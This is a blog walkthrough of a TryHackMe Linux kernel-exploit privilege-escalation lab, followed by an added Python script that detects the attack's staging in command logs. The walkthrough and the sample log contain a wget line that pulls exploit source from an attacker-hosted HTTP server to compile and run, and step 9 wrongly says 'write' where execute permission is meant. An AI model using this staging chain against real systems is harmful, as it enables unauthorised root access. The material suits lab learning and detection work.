Michael Oladele
Try Hack Me: Linux PrivEsc Complete Steps

Completing the TryHackMe Linux Privilege Escalation labs on the Jr Penetration Tester path was challenging for me, so I thought I should write about it. Let's get started!

I will skip some of the informational parts and jump straight to Task 5.

Task 1: Introduction

Task 2: What is Privilege Escalation?

Task 3: Enumeration

It does not matter how you gain the initial foothold: when you land on your target machine, the first thing you want to do is enumeration.

For the full enumeration steps, head over to the TryHackMe Linux Privilege Escalation lab.

Now let's dive into the main reason for this article:

Task 5: Privilege Escalation: Kernel Exploits

This task expects us to escalate our privileges via a kernel exploit.

Steps:

  1. Get a foothold on the target system. In this case, we SSH into the target machine from our attack machine with the credentials provided.
  2. Since we are to escalate through a kernel exploit, we need to find the kernel version of the machine by running the command below:

uname -a


  3. Now that we have the kernel version, we need to search Exploit-DB for an exploit to use against the victim machine's kernel. We are in luck: we found an exploit on Exploit-DB. In most cases we might have to dig a little more on the internet.


  4. Click Download to save the exploit to your attacker machine.


  5. The next step is to find a way to get the exploit code onto the victim machine. I will be doing this with the Python 3 HTTP server.
  6. On the attacker's machine, run the command below in the same directory as the file you want to host; it serves the directory on port 8080.

python3 -m http.server 8080

  7. Once your server is running on the attacker's machine, you need to fetch the file on the victim's machine with wget. Run the command below on the victim's machine:

wget http://<attacker_IP>:<port>/<file_name>


If we check the directory with ls on the victim's machine, we can see the downloaded file.

  8. After the download, run the command below to compile the C file on the victim's machine.

gcc <filename.c> -o <name_want_to_call_the_compiled_file> -w

  9. Then you need to give write permission to the compiled file.

If successful, you should see the compiled file in the directory. Then run id to see the current user.


You can see that we are still the regular user at the moment.

  10. Then run the exploit.


Now, after running the exploit, we are root.

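The steps above leave a very recognisable trail on the victim: a kernel version check, a wget from an ad-hoc HTTP server, a gcc -o build of the downloaded source, a chmod on the output and then its execution, all by one user within a couple of minutes. The script below is an added example for the defender's side of this lab, written for this article and not part of the TryHackMe room or the original post. It assumes a per-user command log in the form "ISO timestamp, user, command" (the kind a shell-audit forwarder produces; the sample lines, hosts and user names are constructed) and a 15-minute window for the whole chain, both of which are assumptions you would adjust for your own telemetry.

```python
"""Flag the download -> compile -> execute staging chain from the walkthrough
in per-user command logs. Detection logic only; contains no exploit code."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from posixpath import basename
from urllib.parse import urlparse

# Assumption: one user completes the whole chain inside this window.
WINDOW = timedelta(minutes=15)

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
UNAME_RE = re.compile(r"^uname\b")
DOWNLOAD_RE = re.compile(r"^(?:wget|curl)\b.*?(https?://\S+)")
COMPILE_RE = re.compile(r"^(?:gcc|cc|clang)\b(?P<args>.*)$")
OUTPUT_RE = re.compile(r"-o\s+(\S+)")
CHMOD_RE = re.compile(r"^chmod\b.*\s(\S+)$")

# Constructed sample log: "<ISO timestamp> <user> <command>" per line.
# Hosts, users and file names are made up for this example.
SAMPLE_LOG = """\
2024-01-01T10:00:01 karen uname -a
2024-01-01T10:00:40 karen wget http://10.10.14.5:8080/exploit.c
2024-01-01T10:01:05 karen gcc exploit.c -o exploit -w
2024-01-01T10:01:10 karen chmod +x exploit
2024-01-01T10:01:12 karen ./exploit
2024-01-01T11:30:00 alice gcc hello.c -o hello
2024-01-01T11:30:05 alice ./hello
2024-01-01T12:00:00 bob wget http://10.10.14.5:8080/notes.txt
"""


def parse_events(text):
    """Return (timestamp, user, command) tuples, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["user"], m["cmd"]))
    return events


def _executes(cmd, binary):
    """True if the command's first word runs `binary` (name, ./name or path/name)."""
    first = cmd.split()[0]
    return first == binary or first.endswith("/" + binary)


def detect_chains(text):
    """Per user, link a downloaded .c file to a compiler output that is later run.

    Returns one alert dict per completed chain. uname and chmod are reported
    as supporting stages when seen but are not required for an alert.
    """
    by_user = defaultdict(list)
    for ts, user, cmd in parse_events(text):
        by_user[user].append((ts, cmd))

    alerts = []
    for user, evs in by_user.items():
        evs.sort()
        recon_ts = None
        downloaded = {}  # file name -> time it was fetched
        built = {}       # output binary -> {compiled, source, chmod}
        for ts, cmd in evs:
            if UNAME_RE.match(cmd):
                recon_ts = ts
                continue
            dm = DOWNLOAD_RE.match(cmd)
            if dm:
                downloaded[basename(urlparse(dm.group(1)).path)] = ts
                continue
            cm = COMPILE_RE.match(cmd)
            if cm:
                args = cm["args"]
                om = OUTPUT_RE.search(args)
                out = om.group(1) if om else "a.out"
                for src in (a for a in args.split() if a.endswith(".c")):
                    if src in downloaded and ts - downloaded[src] <= WINDOW:
                        built[out] = {"compiled": ts, "source": src, "chmod": False}
                continue
            chm = CHMOD_RE.match(cmd)
            if chm and chm.group(1) in built:
                built[chm.group(1)]["chmod"] = True
                continue
            for out, info in built.items():
                if _executes(cmd, out) and ts - info["compiled"] <= WINDOW:
                    stages = ["download", "compile"]
                    if recon_ts is not None and ts - recon_ts <= WINDOW:
                        stages.insert(0, "uname")
                    if info["chmod"]:
                        stages.append("chmod")
                    stages.append("execute")
                    span = ts - downloaded[info["source"]]
                    alerts.append({"user": user, "source": info["source"],
                                   "binary": out, "stages": stages,
                                   "span_seconds": int(span.total_seconds())})
    return alerts


if __name__ == "__main__":
    for a in detect_chains(SAMPLE_LOG):
        print(f"ALERT user={a['user']} {a['source']} -> {a['binary']} "
              f"stages={'>'.join(a['stages'])} span={a['span_seconds']}s")
```

Only the download-to-execution link fires the alert, so alice's ordinary local build and bob's lone download stay quiet; the uname and chmod stages are attached as corroboration because, as the walkthrough shows, they are usually present but an attacker can skip them. On a real host the same logic would sit behind auditd execve records or a shell-history forwarder, and the practical mitigation this detection points to is the one the lab itself makes obvious: keep the kernel patched and do not leave a compiler on production boxes.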

Conclusion

This is the end of the first part of this series. Watch out for Tasks 6 - 12.

I hope this helped someone, as this lab really challenged me, but it was so much fun and it felt good to complete it. Anyway, I got through it, and now so have you!

It's Michael
